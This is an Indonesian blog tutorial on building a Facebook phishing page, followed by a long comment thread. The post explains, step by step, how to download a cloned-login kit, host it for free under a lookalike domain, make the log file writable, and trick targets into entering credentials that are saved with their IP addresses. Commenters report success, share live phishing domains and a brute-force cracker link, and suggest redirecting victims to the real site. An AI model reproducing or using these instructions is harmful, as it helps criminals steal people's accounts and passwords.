Cara Membuat Phising Facebook

Cara Membuat Phising Facebook - Phising merupakan tiruan dari sebuah situs untuk mengelabui seseorang agar orang tersebut meloginkan akunnya ke situs tiruan tersebut, atau dengan kata lain agar dapat mengetahui password si target. Oleh karena itu, phising bisa dikatakan sebagai metode hacking dengan memanfaatkan kelalalian korban. Nah, kali ini saya akan jelaskan cara membuat phising facebook dengan mudah. Jadi ini nanti bisa anda gunakan untuk mendapatkan email dan password facebook target. Anda tertarik? Simak baik - baik.

1. Download saja script phisingnya disini

2. Setelah anda mengunduhnya, coba anda buka file berformat rar tersebut. Di dalamnya terdapat 3 file yang berguna untuk membuat phising. File bernama "index.html" adalah file yang berisi script tiruan dari facebook yang sudah diedit untuk dijadikan tiruan dari halaman utama facebook. File bernama "logs.php" adalah file yang berisi script untuk menyambungkan index.html dengan logs.txt. Jadi di saat ada korban yang login dari tiruan facebook (yg asalnya dari index.html) otomatis email dan passoword yang diloginkan akan tersimpan pada file logs.txt melalui perantara logs.php. Nah file bernama logs.txt itulah tempat email, password, dan IP korban akan tersimpan.

3. Ok, setelah penjelasan diatas, anda extract terlebih dahulu ketiga file tersebut

4. Setelah di ekstrak, upload ketiga file itu ke hostingan anda. Misal idhostinger.com

Untuk cara upload file ke hostingan, lakukan cara berikut

1. Buatlah akun pada idhostinger.com disini

2. Isi formulir pendaftaran dengan benar

Cara Membuat Phising Facebook

3. Jangan lupa centang "saya setuju dengan ketentuan penggunaan layanan" lalu klik "Buat Akun"

4. Setelah itu anda masuk ke akun email anda untuk verifikasi akun hosting anda

5. Klik tautan yang ada di kotak masuk yahoo anda untuk mengaktifkan akun hosting

6. Kini akun anda sudah aktif dan anda akan diarahkan ke http://cpanel.idhostinger.com/switcher. Disitu anda klik "buat akun baru"

7. Pilih yang gratis (sebelah kiri) dan klik "order!"

8. Selanjutnya,  anda pilih domain dan isi kolom tersebut. Kolom domain isikan dengan domain (link) yang nantinya akan dijadikan phising. Misal : www.fatebook.com


Cara Membuat Phising Facebook

NB : Harus sudah memiliki domain aktif, bisa dibuat di intuit atau penyedia domain lainnya.

9. Klik "buat" dan tunggu proses pembuatannya.

10. Jika domain sudah dibuat, klik "beralih" pada sebelah kanan

11. Kini anda berada pada cpanel domain anda. Anda gulung kebawah scroll barnya. Masuk ke file manager 3

Cara Membuat Phising Facebook

12. Selanjutnya anda masuk ke public html. Nah silahkan anda upload ketiga file phising tadi disitu dengan cara klik "upload"

13. Klik "pilih file" untuk memilih script phisingnya dan klik tanda cawang hijau untuk upload

Cara Membuat Phising Facebook

14. Klik lagi tanda cawang hijaunya

Cara Membuat Phising Facebook

15. Selanjutnya klik tanda panah biru

16. Jangan lupa ubah chmod/permissionnya menjadi 777 dengan cara centang "logs.txt" lalu klik "chmod"

Cara Membuat Phising Facebook

Cara Membuat Phising Facebook

17. Klik tanda panah biru untuk kembali ke public html

18. Sekarang anda buka domain anda dan jadilah phising facebook anda. Silahkan anda jebak target anda untuk masuk ke web phising anda dan suruh loginkan akun facebooknya disitu. Alhasil email dan passwordnya akan tersimpan di logs.txt

Selamat memancing ^_^
pasang

139 comments:

  1. ngomong ngomong di mana nya buka domainn nyaa..

    BalasHapus
  2. ya tinggal buka domainnya www.namadomain.com

    BalasHapus
    Balasan
    1. pak sekarang file manajer 3 gak ada di hostinger gimana dong

      Hapus
  3. thanks...phishing-nya jalan 100% :)

    BalasHapus
  4. sama - sama sob, jangan lupa bagi" akun ya hehe :D

    BalasHapus
  5. Hmm..gmna klo phising halaman facebooknya kita ganti dgn halaman login yahoo...???

    Asik juga tuh :D

    BalasHapus
    Balasan
    1. Berarti ini dong gan :D

      Hapus
  6. makasih gan atas infonya..
    sangat membantu tuk membuat akun id hostinger jadinya..
    maklum ane msh newbie

    BalasHapus
  7. sharing ya sharing aja mas brow, tuh para nub kaga ngerti apa" masukin kode chmod 777 bisa lo curi ntar data logs.txt nya hehe :D

    BalasHapus
  8. gan ko gk ada sih email dan passwordnya stelah dicoba dengan akun saya?

    BalasHapus
  9. mungkin logs.txt anda belum dirubah chmodnya, ubah jadi 777 gan

    BalasHapus
  10. gan cara no.10 tuh gmana ya..
    beralihnya dmana??

    BalasHapus
  11. public.html tu yg mna ya gan..

    BalasHapus
  12. Anonim 1 : klik tombol "beralih" yang ada di sebelah kanannya domain

    Anonim 2 : cari aja folder public_html

    Lain kali jangan pake anonim ya biar enak ngomongnya

    BalasHapus
  13. Harus tunggu selama 12 jam agar domain aktif...
    dan lagi. ntar email n pass nya di bakalan masuk kemana ya..?

    BalasHapus
  14. email & pass korban akan masuk ke logs.txt

    BalasHapus
  15. gan ko setelah saya cek pishingnya..kok masuknya di mercusuar ya ??

    BalasHapus
  16. thanks sob info nya,,,sob situs phising yg ane buat kok halaman nya malah putih blank doang yach ??? apa gara" defaul.php nya kehapus sma ane ??? oukh iyah klo mau update nameserver di idhostinger cara nya gimana ??? tolong bimbingan nya sob thanks

    BalasHapus
  17. Boromania : mercusuar? apa'an tuh? 0.0 ntar kayak gini gan tampilan phisingnya http://i.imgur.com/XA2Hzoj.png

    Heru : gini gan tampilannya http://i.imgur.com/XA2Hzoj.png
    Klo warna putih blank coba direfresh dulu

    BalasHapus
  18. Nanti kayak gini penampakan di logs.txt nya http://img4.imageshack.us/img4/7914/dea25d7ac2a245ffb9263c2.png

    BalasHapus
  19. udah ane refresh tpi tetap aja gitu,,,klo di index.html nya ane klik kanan trus buka tautan tab baru juga putih sma di tempat URL nya juga malah about;blank kaya gitu sob ??? thank info nya sob

    BalasHapus
  20. gan ane udah bisa tapi kok gak muncul tampilan awal facebook ya ??

    coba cek ini gan situs ane http://autofacebook.com/?nr=0

    BalasHapus
  21. Gan, cara menyebarkan hasil phising kita gimana tuh ?

    BalasHapus
  22. waduh... nih orang2 pd suka main phising ya hehe, serius amat pengen buat phising :O Intinya dlm membuat phising ini harus punya domain dulu, ntah buat lewat intuit, idhostinger, atau hosting2 lainnya. Baru deh upload file phisingnya untuk dipasang pada domain

    BalasHapus
  23. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  24. Kok "beralih" kagak ada ?

    BalasHapus
  25. emang harus nunggu berapa lama supaya berhasil ?

    BalasHapus
  26. kalau semuanya udah selesai,truss gimana lagi sobb ... !!!
    Mohon Reply !!!!

    BalasHapus
  27. ahmad : ya sebarin gan phisingnya -,-

    BalasHapus
  28. nyebarinnya gimana gan...???

    BalasHapus
  29. emangnya harus nunggu sape 24 ye..?

    BalasHapus
  30. gan saya ko pas masukin kode capcha nya salah terus yah?

    BalasHapus
  31. keren" cara nya ..
    thank yah gan !!
    100%berhasil ..

    BalasHapus
  32. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  33. klo pass yahoo yg kita pake buat facebook nya lupaa ky gimana gan....

    BalasHapus
  34. kok domain ku gg bisa di buka

    BalasHapus
  35. cara menjebaknya gmana min....??

    BalasHapus
  36. gan kok link phising saya cuma layar putih doank? thx

    BalasHapus
  37. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  38. kalo code domain nya brp ??

    BalasHapus
  39. gan bisa kasih saya penjelasan?
    saya kurang paham, tolong :'(

    BalasHapus
  40. gue gk jadi gan > malah jadinnya kayak gini : http://prntscr.com/1bbgiw

    BalasHapus
  41. saya masih bingung masukin domainnya ??

    BalasHapus
  42. gan udah jdi cara menggunakannya gmna yah????

    BalasHapus
  43. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  44. gan, minta domain agan sama hostingnya..
    bingung banget @-)

    BalasHapus
  45. Harus tunggu berapa lama supaya domain nya aktif?

    BalasHapus
  46. kok udah lebih dari 24 jam, tidak aktif juga, misalkan saya buat dengan domain fakefacebook.com, cara menjalankan bagaimana? apa hanya menulis fakefacebook.com atau memakai fakefacebook.com/index.html dll?

    BalasHapus
  47. thanks, gan,, :D bermutu buat saya nih!! xD :>) (h)

    BalasHapus
  48. Gan Kok Link Pishing Nya Ga bisa ?
    Katanya Mercusuar Gan ....

    BalasHapus
  49. Bro logs.txt itu file kosong ngan kagak ?

    BalasHapus
  50. gan dapat domain di mana y ??

    BalasHapus
  51. sob kalo mau nyebakbnya gmn ?

    BalasHapus
  52. kalau twitter gimana gan?

    BalasHapus
  53. sukses gan kunjungi dodycs8.p.ht

    BalasHapus
  54. gan ane gak ngerti ,, udah di coba tpi kok munculnya mercusuar gan ,,,, gimana caranya ane kurang paham

    BalasHapus
  55. Kolel Udin : di intuit bisa, dari id hostingernya pun bisa, atau penyedia domain lainnya banyak kok yg free (o)

    Dody : haha sip gan :-b

    Ari Hamzah : anda punya domain aktif gak? Seperti yg .com / .tk / .ml / .name / dsb? Anda buat dulu sebuah domain di penyedia domain (cari yg free aja), atau bisa buat subdomain saja di id hostinger seperti dody

    BalasHapus
  56. Bro kok Fb yang ku bikin kok gak tau cara loginnya sih bro jadinya aneh coba buka bima.com/ masa kaga bisa

    BalasHapus
  57. email sama pass nya masuk nya dimana gan ?

    BalasHapus
  58. berapa jam waktu yang di perlukan untuk aktif?
    kita jebaknya pakai nama web yang ada di petunjuk 8?

    RESPON

    BalasHapus
  59. harus nunggu dulu kah biar aktif ??
    kalau nunggu, nuggunya berapa jam/hari ??

    :-?

    BalasHapus
  60. gan kok gk ada tampilan facebooknya gan gmna nih ?? help

    BalasHapus
  61. Biasanya butuh waktu 24 jam untuk aktif paling cepat

    BalasHapus
  62. Gan tampilan domail gw koq kayak gini ya http://faacceboook.id1945.com/

    BalasHapus
  63. Di "logs.php" nya
    saya rasa lebih keren kalau pake "header ('Location:http://www.facebook.com');"

    BalasHapus
  64. dari pada susah susah buat ane mending beli di jualhackfacebook.blogspot.com .

    BalasHapus
  65. gan, kickfb.pusku.com . ini situs phising punya gw tapi kok tulisanya google tidak bisa menemukan alamat situsnya... mohon pencerahannya ;(

    BalasHapus
  66. waduh ribet amat, ni yg simple gw kasih link downloadnya ga ribet ga pake lama dan work 1000% gw udh coba berulang kali, mudah-mudahan link download msh valid atau server si hacker msh aktif... krn sistem kerja software tersebut dgn BRUTE-FORCE alias si programernya yg ngehack kit atinggal tunggu aja dgn sabar pasti akan muncul tuh password.. http://www.4shared.com/file/krbiq1Ay/Brute-Foce_Crack_Pass_FB.html?

    BalasHapus
  67. saya kok tdk bisa mendaftar/buat domainnya,setelah saya klik buat, selalu tampil seperti di bawah ini

    Rekomendasikan

    Logo
    Pilih tema

    Pilih bahasa

    Profil Saya
    Hosting
    Server
    Domain
    Tagihan
    Pengetahuan
    Pengumuman
    Pusat Bantuan
    Afiliasi
    Keluar
    x
    Server #38 is under the DDOS attack (IP Nullrouted)
    We have just received a HUGE (over 3GB/s incoming traffic) DDoS attack targeting the Server #38. Our CISCO guard firewall was unable to handle such attack, so one of the server IP address - 185.28.20.81 was disabled (all the rest websites on this server are working fine). If your website is using this IP (due to unique IP rotation system only 3% websites are using this IP) it will be unavailable for the next 6 hours. As soon attack will subside, this IP address will be enabled and your website will start working again. We thank you for your patience and understanding.

    2013-10-16 10:55:15
    x
    Tampaknya Anda melewatkan sesuatu..
    Buat sebuah Akun Baru

    Subdomain Domain
    Domain www.
    aktif
    Password
    Ulangi password
    Masukkan kode capcha
    Masukkan kode capcha

    © 2013 Hostinger Indonesia. All rights reserved.

    BalasHapus
  68. http://www.4shared.com/file/krbiq1Ay/Brute-Foce_Crack_Pass_FB.html?

    BalasHapus
  69. Gan ini gmna?
    Server tidak ditemukan

    Firefox tidak menemukan server di www.fatibook.net.

    Periksa kesalahan pengetikan pada alamat seperti ww.example.com yang seharusnya www.example.com
    Bila Anda tidak dapat memuat laman apa pun, periksa sambungan jaringan komputer Anda.
    Bila komputer atau jaringan Anda dilindungi firewall atau proxy, pastikan bahwa Firefox diizinkan untuk mengakses Web.

    BalasHapus
  70. Punya Ku Kok gK Jadi ? selalu begini
    http://prntscr.com/1zdkl0

    BalasHapus
  71. itu kalo liat passwordnya dimananya domain ???
    domain saya www.getautolike.com

    BalasHapus
  72. thank's bro phisingnya lengkap sekali.. :)
    100% work saya liat di bloggerz lain dan cuma ini yang paling lengkap thank's bro..

    BalasHapus
  73. ud jadi smua tp dmn liat paswrd fb target

    BalasHapus
  74. Kan udah saya tulis untuk password ada di logs.txt :-s

    BalasHapus
  75. cara menghapus domainnya gmn gan? apakah bisa d hapus?

    BalasHapus
  76. Akun Anda telah dibuat!

    Website info-terbaru.esy.es telah sukses diinstal di server kami! Silahkan Anda hapus file default.php dari folder public_html dan kemudian uploadlah website Anda dengan menggunakan FTP atau File Manajer

    Berikut adalah daftar file Anda yang berada di folder public_html:
    default.phpdefault.php10 KBNovember 13, 2013 20:14:45
    Web Hosting | Hosting Gratis | Support Forum | Client Login
    Hostinger © 2013. All rights reserved
    maksudnya ni gimana gan...

    BalasHapus
  77. Bang.. cara liat email ma password gimana bang?

    BalasHapus
  78. kok punya saya problem loading page ya domainnya

    BalasHapus
  79. Nak tanya ..saye org malaysia..kenape link yg seperti ini ( www.pengalamanhidupku.net ) ini tidak boleyh dibuka..mohon penjelasan..:)

    BalasHapus
  80. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  81. gan, phising ane udah jadi nih. . tapinya waktu ane buka ada tulisan "ada situs web yang dilaporkan sebagai phising"
    kalau misalkan orang lain ngebuka link ane, apa bakal keluar tulisan gitu juga ? :-?

    BalasHapus
  82. Ternyata yg komen bnyak yg newbe ,,,
    gua ksh sedikit pengertian y
    kalo kga bisa muncul pas udh di upload coba pergi ke bagian dasbor web trus pilih kembalikan account yang di samping kiri bacaan delete jangan di delete
    account ny ok tp di reload account ... udh balik coba ubh atau rename php duplikat facebook nya di ganti sm html trus upload kembali pasti sukses ..

    #kalosdikit kurang jelas sorry yeh

    BalasHapus
  83. gan File manger 3 kok gk ada...??

    BalasHapus
  84. kok gak bisa ya pas buat akun baru??

    BalasHapus
  85. kalo cara ngmbliin phising nya gmna gan???

    BalasHapus
  86. bang di id hostinger saya kok gk ada file manager 3 nya

    BalasHapus
  87. gan ..maap.tolong untuk file manajer 3 kok tidak ada ..untuk menampilkan yg agan sarankan utuk pilih file manajer 3 gmn? thank seblumnya
    sperti ini yg ada...File
    -Akses FTP
    -Akun FTP
    -File Manajer 2
    -Backup
    -Laporan Login FTP
    -Laporan Error
    -File Manajer (Disarankan

    BalasHapus
  88. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  89. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  90. lagunya keren gan. lagu apa ni yak???

    BalasHapus
  91. tolong buatin aku dong phising 1 aja ...
    nama fb aku : putri nadiya pratiwi
    makaisih yah

    BalasHapus
  92. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  93. Gan ane kok pas mau buka file manager 2 (file manager 3 gk ada) keluarnya
    Forbidden

    You don't have permission to access /3/ on this server.

    terus cara betulinnya gmn?

    BalasHapus
  94. gan, kok gw gak ada file manger 3-nya?? :-?

    BalasHapus
  95. Gan Ko Ane Buat Domainnya Gagal Terus

    BalasHapus
  96. mantep kang tutorial phisingnya : www.tutorhack.com

    BalasHapus
  97. bang kok ane buat hostinger nya gagal terus?? :-( ya bang knp??
    saya udh cba brp2 kali gagal terus??

    BalasHapus
  98. tahun kemaren aku bisa :) tapi, kok tahun ini nggak ada file 'FILE MANAJER 3' ?? :-?

    BalasHapus
  99. langkah ke 7 gk bisa buat domain baru

    BalasHapus
  100. Gan kok ga ada file manajer 3 gue adanya 1 dan 2 nih respon Please (p) (h)

    BalasHapus
  101. Maaf, untuk masalah terkait phising atau sejenisnya tidak bisa saya jawab. Karena hal itu bisa merugikan orang lain dan juga sekarang saya sudah tidak update tentang IdHostinger [-( Jadi saya serahkan pada pengetahuan masing-masing.

    BalasHapus
  102. file manager 3 nya kok gaada ya?

    BalasHapus
  103. gan...klo dtelaah dri penjelsannya...kykx phising iini harus di login target ya gan...nah gimna klao targetnya jauh dri kita....maaf sharex gan...

    BalasHapus
  104. Untuk semuanya . jika sudah berhasil . dan dibuka hanya mercusuar . berarti domain kalian sudah terhapus oleh id.hostinger . Karna web yg mengandung phising secepatnya akan di hapus oleh web hosting yg ada . dan jika ada masalah file manager gaada . silahkan ganti aja web hosting nya . sudah tersedia banyak di google . semoga membantu . terimakasih


    Untuk admin , kunjunganya yaa di http://ray-software.blogspot.com

    BalasHapus
  105. Bos di Akun saya kok ga ada tulisan File Manajer 3 <- Adanya cuman - File Manajer 2

    BalasHapus
  106. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  107. siapa yg bisa buatin ??
    nanti aku bayar deh

    BalasHapus
    Balasan
    1. aku buat cara hmpir sama jdi nya ini :3
      autofollowers2014.bl.ee

      Hapus
    2. Komentar ini telah dihapus oleh administrator blog.

      Hapus
  108. Mantep kang artikelnya : http://www.tutorhack.com

    BalasHapus
  109. Mas kok saya gk ada file manager 3 ya?? kenapa ? :-? :-? :-? :-?

    BalasHapus
  110. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  111. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  112. kok masih belum aktif kang,,,,,mohon bantuan,,,

    BalasHapus
  113. saya sudah buat semuanya..tapi kenapa jadi macam ini ya

    BalasHapus
  114. saran saya gausah pake domain TLD pun gak apa-apa gan.
    peke domain subdomain juga bisa yang dari iDhostinger

    kebanyakan yang masih newbie gatau, cara pasang nama sever atau cara registed domainnya.

    BalasHapus
  115. Gan Kok jadinya Index Of [-)

    BalasHapus
    Balasan
    1. Mungkin anda belum upload file index.html atau salah tempat buat upload filenya

      Hapus
  116. $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>


    gan,,,www.Facebook.com di atas apa harus di ganti dengan domain kita gt ya gan??

    BalasHapus
  117. tanks gan,,!!? phising jalan 1.000 % :>) ,,,tp ada satu pertanya'an gan,,pas kita buka index.php nya di situ terlihat 3 kotak?kolom untuk masukin
    1.EMAIL
    2.PASSWORD
    dan satunya lg untuk apa ya gan?? atau emank itu ya yang di sebut permision nya,,??? blz

    BalasHapus
  118. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  119. bang domain itu apaan sh?

    BalasHapus
  120. file manajer 3 skrng gk ada ;(( ? pilih yg mna?

    BalasHapus

Hargai penulis dengan memberikan komentar yang baik dan mengklik iklan yang ada

Rules komentar :
1. No SPAM
2. No live link (link aktif)
3. Jika bertanya gunakan akun yang terdaftar, bertanya dengan anonim tidak akan dijawab
4. Komentar yang tidak sepantasnya akan dihapus oleh admin

Pelajari cara berkomentar yang baik disini

 
Top